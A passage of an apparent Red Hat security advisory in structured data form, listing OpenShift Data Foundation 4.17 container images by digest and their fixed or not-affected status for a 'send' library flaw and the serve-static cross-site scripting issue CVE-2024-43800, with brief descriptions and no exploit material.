"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", 